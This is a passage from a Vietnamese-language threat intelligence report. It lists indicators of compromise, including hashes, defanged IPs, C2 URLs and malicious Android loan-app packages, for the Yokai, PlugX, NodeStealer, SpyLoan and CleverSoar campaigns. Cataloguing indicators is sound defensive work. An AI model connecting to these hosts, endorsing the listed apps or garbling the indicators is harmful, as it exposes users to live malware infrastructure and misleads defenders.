386eb7aa33c76ce671d6685f79512597f1fab28ea46c8ec7d89e58340081e2bd – Bitdefender Crash Handler (2011)
IP
38.60.146[.]78:443 – Stowaway
118.107.219[.]66:443 – Stowaway
45.123.188[.]180 – FastReverseProxy
198.244.237[.]131 – Rakshasa download
4.1.2 CleverSoar Malware nhắm đến người dùng tại Việt Nam và Trung Quốc
Indicator of Compromise (IoC)
Indicators | Indicator Type | Mô tả |
0e501e4581610c7618466e071c28691eb8680ab1 | SHA1 | CleverSoar Installer |
156.224.26[.]7 | IP | Winos4.0 C2 |
8848.twilight[.]zip | Domain | Backdoor C2 |
4.1.3 Chiến dịch Yokai Backdoor nhắm mục tiêu vào tổ chức tại Thái Lan, sử dụng DLL side-loading
Indicator of Compromise (IoC)
Hash SHA256
RAR file
248c50331f375e7e73f010e4158ec2db8835a4373da2687ab75e8a73fde795f0
LNK files
c74f67bb13a79ae8c111095f18b57a10e63d9f8bfbffec8859c61360083ce43e
24509eb64a11f7e21feeb667b1d70520b1b1db8345d0e6502b657d416ef81a4d
Benign decoy documents
c7746e0031fba26ca6a8ecc3cee9e3dd50507fe2c1136356f852e068e1f943d0 (PDF)
90f4364705f19929d5cc0dafc44946768e39e81338715503dbc923b75c6edfd5 (DOCX)
Dropper
f361f5ec213b861dc4a76eb2835d70e6739321539ad216ea5dc416c1dc026528
Legitimate iTop Data Recovery application
452be2f9018f1ef2d74c935eac391ecdceff9a12cb950441f4f4e26b2b050fa1
Yokai Backdoor
eaae6d5dbf40239fb5abfa2918286f4039a3a0fcd28276a41281957f6d850456
3e5cfe768817da9a78b63efad9e60d2d300727a97476edf87be088fb26f06500
1626ce79f2b96c126cbdb00195dd8509353e8754b1a0ce88d359fa890acd6676
2852223eb40cf0dae4111be28ce37ce9af23e5332fb78b47c8f5568d497d2611
C2 addresses
122.155.28[.]155:80/page/index.php
154.90.47[.]77:80/
191.police.go[.]th:443/api/index.php
191.police.go[.]th:443/Assessment/Report/PDF/default.php
m-society.dpis.go[.]th:443/default.php
49.231.18[.]150:80/research/files/index.php
4.1.4 Phần mềm độc hại SpyLoan nhắm vào người dùng tại Nam Mỹ, Đông Nam Á và Châu Phi
Indicator of Compromise (IoC)
Package | App Name | Downloads | Country | SHA256 |
com.prestamoseguro.ss | Préstamo Seguro-Rápido, seguro | 1M | Mexico | f71dc766744573efb37f04851229eb47fc89aa7ae9124c77b94f1aa1ccc53b6c |
com.voscp.rapido | Préstamo Rápido-Credit Easy | 1M | Colombia | 22f4650621fea7a4deab4742626139d2e6840a9956285691b2942b69fef0ab22 |
com.uang.belanja | ได้บาทง่ายๆ-สินเชื่อด่วน | 1M | Senegal | b5209ae7fe60abd6d86477d1f661bfba306d9b9cbd26cfef8c50b81bc8c27451 |
com.rupiahkilat.best | RupiahKilat-Dana cair | 1M | Senegal | 9d51a5c0f9abea8e9777e9d8615bcab2f9794b60bf233e3087615638ceaa140e |
com.gotoloan.cash | ยืมอย่างมีความสุข – เงินกู้ | 1M | Thailand | 852a1ae6193899f495d047904f4bdb56cc48836db4d57056b02352ae0a63be12 |
com.hm.happy.money | เงินมีความสุข – สินเชื่อด่วน | 1M | Thailand | 43977fce320b39a02dc4e323243ea1b3bc532627b5bc8e15906aaff5e94815ee |
com.kreditku.kuindo | KreditKu-Uang Online | 500K | Indonesia | dfbf0bf821fa586d4e58035ed8768d2b0f1226a3b544e5f9190746b6108de625 |
com.winner.rupiahcl | Dana Kilat-Pinjaman kecil | 500K | Indonesia | b67e970d9df925439a6687d5cd6c80b9e5bdaa5204de14a831021e679f6fbdf1 |
com.vay.cashloan.cash | Cash Loan-Vay tiền | 100K | Vietnam | e303fdfc7fd02572e387b8b992be2fed57194c7af5c977dfb53167a1b6e2f01b |
com.restrict.bright.cowboy | RapidFinance | 100K | Tanzania | e59fd9d96b3a446a2755e1dfc5a82ef07a3965866a7a1cb2cc1a2ffb288d110c |
com.credit.orange.enespeces.mtn.ouest.wave.argent.tresor.payer.pret | PrêtPourVous | 100K | Senegal | 453e23e68a9467f861d03cbace1f3d19909340dac8fabf4f70bc377f0155834e |
com.huaynamoney.prestamos.creditos.peru.loan.credit | Huayna Money – Préstamo Rápido | 100K | Peru | ef91f497e841861f1b52847370e2b77780f1ee78b9dab88c6d78359e13fb19dc |
com.credito.iprestamos.dinero.en.linea.chile | IPréstamos: Rápido Crédito | 100K | Chile | 45697ddfa2b9f7ccfbd40e971636f9ef6eeb5d964e6802476e8b3561596aa6c2 |
com.conseguir.sol.pe | ConseguirSol-Dinero Rápido | 100K | Peru | 79fd1dccfa16c5f3a41fbdb0a08bb0180a2e9e5a2ae95ef588b3c39ee063ce48 |
com.pret.loan.ligne.personnel | ÉcoPrêt Prêt En Ligne | 50K | Thailand | 27743ab447cb3731d816afb7a4cecc73023efc4cd4a65b6faf3aadfd59f1768e |
4.2 Danh sách IoCs liên quan đến mã độc
4.2.1 Các phát hiện mới liên quan đến mã độc PlugX
Indicator of Compromise (IoC)
Domains
howtotopics[.]com
thelocaltribe[.]com
councilofwizards[.]com
goclamdep[.]net
Administration Servers
115.61.168[.]143
115.61.169[.]139
182.114.110[.]170
Tệp tin độc hại
Hash SHA-1
b463f3c978f11a12e4cbdfd6ff141451ed32bb7c
3d60ae2d85c3370aefe2ce75d59bcbd6bd5143f8
a1effe50783e442e0ec62bd848eb21e50e32f69e
b6f020b568b604205a93025fe9b00a10db830629
fc8d5e3ffc56198118b1d5155c9116a242008809
a8a7c84adc604f64a3800fb7bba4262c103d7531
C2 Servers (October-December 2024)
103.79.120[.]92
45.83.236[.]105
116.206.178[.]67
45.133.239[.]183
116.206.178[.]68
103.238.225[.]248
45.133.239[.]21
103.238.227[.]183
103.107.104[.]37
107.148.32[.]206
167.179.100[.]144
116.206.178[.]34
149.104.2[.]160
207.246.106[.]38
45.76.132[.]25
155.138.203[.]78
144.76.60[.]136
38.180.75[.]197
107.155.56[.]15
107.155.56[.]87
202.91.36[.]213
107.155.56[.]4
149.104.12[.]64
154.205.136[.]105
223.26.52[.]208
45.128.153[.]73
96.43.101[.]245
45.135.119[.]132
161.97.107[.]93
103.107.105[.]81
103.107.104[.]4
103.107.104[.]57
154.90.47[.]123
147.78.12[.]202
4.2.2 Mã độc NodeStealer
Indicator of Compromise (IoC)
Tệp tin độc hại
Hash SHA1
c422b0dc002533fad9bed9a8eb6ae7c17a57405d
e9a578b98b70e0c2e2bc4ee1f33cae1270297846
Hash SHA256
786db3ddf2a471516c832e44b0d9a230674630c6f99d3e61ada6830726172458
URL:
hxxps://t[.]ly/MRAbJ
hxxp://88[.]216[.]99[.]5:15707/entry[.]txt